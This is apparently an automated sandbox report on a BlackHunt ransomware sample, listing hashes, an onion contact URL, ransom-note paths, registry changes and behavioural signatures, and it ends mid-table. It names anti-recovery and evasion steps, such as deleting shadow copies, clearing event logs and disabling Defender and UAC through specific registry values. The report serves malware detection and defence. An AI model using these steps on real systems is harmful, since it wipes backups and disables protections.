Analysis
- max time kernel: 119s
- max time network: 123s
- platform: windows7_x64
- resource: win7-20231129-en
- resource tags: arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
- submitted: 18/01/2024, 23:51
Static task: static1

Behavioral task: behavioral1
- Sample: 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
- Resource: win7-20231129-en

Behavioral task: behavioral2
- Sample: 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
- Resource: win10v2004-20231215-en
General
- Target: 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
- Size: 707KB
- MD5: d215e3702125c47834e2d3f4f61bf5e4
- SHA1: a1f269fb1aca70ad28fa02f17ce63a303e03a8f4
- SHA256: 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec
- SHA512: ac7475cb2fbeaa9dc4a2a8c6e378da72e6dd78b4538adbed6f888ddb954f6bccd41f8150293bc77d7088140b501f34cec9863c58d6e1f6efcd73ccab9ba95407
- SSDEEP: 6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1I82vnh:6uaTmkZJ+naie5OTamgEoKxLWjIh
Malware Config
Extracted
- C:\ProgramData\#BlackHunt_ReadMe.hta
- http-equiv="x-ua-compatible"
- http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures

Deletes NTFS Change Journal (2 TTPs, 2 IoCs)
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
  pid   Process
  1672  fsutil.exe
  1208  fsutil.exe

  description      ioc                                                                                                                  Process
  Key created      \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection                                  vssvc.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"  vssvc.exe

  description      ioc                                                                                      Process
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
Clears Windows event logs (1 TTPs, 5 IoCs)
  pid   Process
  1512  wevtutil.exe
  3596  wevtutil.exe
  5420  wevtutil.exe
  2632  wevtutil.exe
  3864  wevtutil.exe
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTPs, 4 IoCs)
  pid   Process
  2948  bcdedit.exe
  1276  bcdedit.exe
  2760  bcdedit.exe
  3036  bcdedit.exe
Renames multiple (2875) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.

  pid  Process
  564  wbadmin.exe
  908  wbadmin.exe

Disables Task Manager via registry modification

Disables use of System Restore points (1 TTPs)

Deletes itself (1 IoCs)
  pid   Process
  5620  cmd.exe
Adds Run key to start application (2 TTPs, 1 IoCs)
  description      ioc                                                                                                                                      Process
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta"  reg.exe

  description      ioc                                                                                      Process
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
Enumerates connected drives (3 TTPs, 27 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
  description             ioc     Process
  File opened (read-only)  \??\X:  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened (read-only)  \??\N:  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened (read-only)  \??\T:  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened (read-only)  \??\A:  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened (read-only)  \??\W:  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened (read-only)  \??\H:  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened (read-only)  \??\K:  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened (read-only)  \??\F:  fsutil.exe
  File opened (read-only)  \??\J:  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened (read-only)  \??\L:  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened (read-only)  \??\Z:  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened (read-only)  \??\M:  fsutil.exe
  File opened (read-only)  \??\P:  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened (read-only)  \??\S:  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened (read-only)  \??\G:  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened (read-only)  \??\B:  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened (read-only)  \??\R:  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened (read-only)  \??\Y:  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened (read-only)  \??\V:  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened (read-only)  \??\F:  vssadmin.exe
  File opened (read-only)  \??\F:  vssadmin.exe
  File opened (read-only)  \??\E:  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened (read-only)  \??\O:  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened (read-only)  \??\I:  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened (read-only)  \??\M:  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened (read-only)  \??\Q:  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened (read-only)  \??\U:  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  2     ip-api.com
Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  description      ioc                                                                                                                               Process
  Set value (str)  \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg"  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
Drops file in Program Files directory (64 IoCs)
  description                   ioc                                                                                                                                          Process
  File opened for modification  C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\vistabg.png  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\Java\jre7\lib\zi\GMT  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File created                  C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\#BlackHunt_Private.key  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File created                  C:\Program Files\VideoLAN\VLC\lua\#BlackHunt_ReadMe.txt  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File created                  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\#BlackHunt_ReadMe.txt  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.runtime_0.10.0.v201209301036.jar  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File created                  C:\Program Files\VideoLAN\VLC\locale\ne\#BlackHunt_ReadMe.hta  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File created                  C:\Program Files\VideoLAN\VLC\locale\tl\#BlackHunt_Private.key  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-bootstrap.xml  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File created                  C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\#BlackHunt_ReadMe.txt  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\title.htm  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-attach.jar  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File created                  C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#BlackHunt_ReadMe.hta  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File created                  C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\#BlackHunt_ReadMe.txt  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\vlc.mo  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\7-Zip\Lang\hy.txt  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Lagos  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_ja.jar  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Jamaica  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\contbig.gif  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\Java\jre7\lib\zi\Pacific\Kosrae  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File created                  C:\Program Files\VideoLAN\VLC\plugins\meta_engine\#BlackHunt_ReadMe.txt  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File created                  C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\#BlackHunt_ReadMe.hta  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_zh_4.4.0.v20140623020002.jar  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File created                  C:\Program Files\DVD Maker\en-US\#BlackHunt_ReadMe.txt  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search.api  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_VideoInset.png  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\scrapbook.png  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Vostok  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File created                  C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\#BlackHunt_ReadMe.hta  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File created                  C:\Program Files (x86)\Google\Update\Install\#BlackHunt_Private.key  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\blackbars80.png  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer_3.2.200.v20140827-1444.jar  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\Java\jre7\lib\zi\America\Adak  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\VideoLAN\VLC\lua\playlist\youtube.luac  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File created                  C:\Program Files\VideoLAN\VLC\plugins\video_output\#BlackHunt_ReadMe.hta  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\title_trans_notes.wmv  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text_3.5.300.v20130515-1451.jar  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\Java\jre7\lib\zi\Asia\Seoul  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File created                  C:\Program Files\VideoLAN\VLC\locale\vi\#BlackHunt_Private.key  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Tucuman  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-windows.jar  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-actions.xml  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File created                  C:\Program Files\VideoLAN\VLC\lua\meta\#BlackHunt_ReadMe.txt  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File created                  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\#BlackHunt_ReadMe.hta  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_ja.jar  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\Java\jre7\lib\zi\Asia\Novokuznetsk  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\vlc.mo  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File created                  C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\#BlackHunt_Private.key  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\SuspendCompare.doc  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\15x15dot.png  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Fiji  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\Java\jre7\lib\zi\Africa\Windhoek  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\Java\jre7\lib\zi\Australia\Currie  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File created                  C:\Program Files\VideoLAN\VLC\locale\sl\#BlackHunt_Private.key  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\VideoLAN\VLC\lua\http\dialogs\browse_window.html  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\VideoLAN\VLC\lua\intf\luac.luac  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File created                  C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\#BlackHunt_Private.key  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File opened for modification  C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationRight_ButtonGraphic.png  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File created                  C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\#BlackHunt_ReadMe.txt  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  File created                  C:\Program Files\VideoLAN\VLC\locale\gd\#BlackHunt_ReadMe.txt  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid   Process
  2720  schtasks.exe
Interacts with shadow copies (2 TTPs, 6 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
  pid   Process
  324   vssadmin.exe
  2400  vssadmin.exe
  1836  vssadmin.exe
  1184  vssadmin.exe
  1100  vssadmin.exe
  3856  vssadmin.exe

Kills process with taskkill (1 IoCs)
  pid   Process
  1644  taskkill.exe

Modifies registry class (8 IoCs)
  description      ioc                                                                                             Process
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico"   reg.exe
  Key created      \REGISTRY\MACHINE\Software\Classes\.Hunt2                                                       reg.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\                                                      reg.exe
  Key created      \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon                                           reg.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico"  reg.exe
  Key created      \REGISTRY\MACHINE\Software\Classes\Hunt2                                                        reg.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\                                                       reg.exe
  Key created      \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon                                            reg.exe
Runs ping.exe (1 TTPs, 1 IoCs)
  pid   Process
  4108  PING.EXE
Suspicious use of AdjustPrivilegeToken (24 IoCs)
  description                      pid   Process
  Token: SeDebugPrivilege           2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  Token: SeRestorePrivilege         2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  Token: SeBackupPrivilege          2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  Token: SeTakeOwnershipPrivilege   2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  Token: SeAuditPrivilege           2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  Token: SeSecurityPrivilege        2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  Token: SeIncBasePriorityPrivilege 2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  Token: SeBackupPrivilege          1732  vssvc.exe
  Token: SeRestorePrivilege         1732  vssvc.exe
  Token: SeAuditPrivilege           1732  vssvc.exe
  Token: SeBackupPrivilege          3428  wbengine.exe
  Token: SeRestorePrivilege         3428  wbengine.exe
  Token: SeSecurityPrivilege        3428  wbengine.exe
  Token: SeSecurityPrivilege        3596  wevtutil.exe
  Token: SeBackupPrivilege          3596  wevtutil.exe
  Token: SeSecurityPrivilege        1512  wevtutil.exe
  Token: SeBackupPrivilege          1512  wevtutil.exe
  Token: SeSecurityPrivilege        2632  wevtutil.exe
  Token: SeBackupPrivilege          2632  wevtutil.exe
  Token: SeSecurityPrivilege        5420  wevtutil.exe
  Token: SeBackupPrivilege          5420  wevtutil.exe
  Token: SeSecurityPrivilege        3864  wevtutil.exe
  Token: SeBackupPrivilege          3864  wevtutil.exe
  Token: SeDebugPrivilege           1644  taskkill.exe
Suspicious use of WriteProcessMemory (64 IoCs)
  description                       pid   Process                                                                   procid_target
  PID 2208 wrote to memory of 1852  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  29
  PID 2208 wrote to memory of 1852  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  29
  PID 2208 wrote to memory of 1852  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  29
  PID 2208 wrote to memory of 1852  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  29
  PID 2208 wrote to memory of 2964  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  31
  PID 2208 wrote to memory of 2964  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  31
  PID 2208 wrote to memory of 2964  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  31
  PID 2208 wrote to memory of 2964  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  31
  PID 2208 wrote to memory of 2804  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  33
  PID 2208 wrote to memory of 2804  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  33
  PID 2208 wrote to memory of 2804  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  33
  PID 2208 wrote to memory of 2804  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  33
  PID 2208 wrote to memory of 2604  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  132
  PID 2208 wrote to memory of 2604  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  132
  PID 2208 wrote to memory of 2604  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  132
  PID 2208 wrote to memory of 2604  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  132
  PID 1852 wrote to memory of 2568  1852  cmd.exe                                                                   35
  PID 1852 wrote to memory of 2568  1852  cmd.exe                                                                   35
  PID 1852 wrote to memory of 2568  1852  cmd.exe                                                                   35
  PID 2208 wrote to memory of 2652  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  38
  PID 2208 wrote to memory of 2652  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  38
  PID 2208 wrote to memory of 2652  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  38
  PID 2208 wrote to memory of 2652  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  38
  PID 2964 wrote to memory of 2672  2964  cmd.exe                                                                   40
  PID 2964 wrote to memory of 2672  2964  cmd.exe                                                                   40
  PID 2964 wrote to memory of 2672  2964  cmd.exe                                                                   40
  PID 2208 wrote to memory of 2680  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  41
  PID 2208 wrote to memory of 2680  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  41
  PID 2208 wrote to memory of 2680  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  41
  PID 2208 wrote to memory of 2680  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  41
  PID 2208 wrote to memory of 2656  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  42
  PID 2208 wrote to memory of 2656  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  42
  PID 2208 wrote to memory of 2656  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  42
  PID 2208 wrote to memory of 2656  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  42
  PID 2208 wrote to memory of 2976  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  44
  PID 2208 wrote to memory of 2976  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  44
  PID 2208 wrote to memory of 2976  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  44
  PID 2208 wrote to memory of 2976  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  44
  PID 2208 wrote to memory of 2304  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  46
  PID 2208 wrote to memory of 2304  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  46
  PID 2208 wrote to memory of 2304  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  46
  PID 2208 wrote to memory of 2304  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  46
  PID 2804 wrote to memory of 2560  2804  cmd.exe                                                                   48
  PID 2804 wrote to memory of 2560  2804  cmd.exe                                                                   48
  PID 2804 wrote to memory of 2560  2804  cmd.exe                                                                   48
  PID 2208 wrote to memory of 2756  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  50
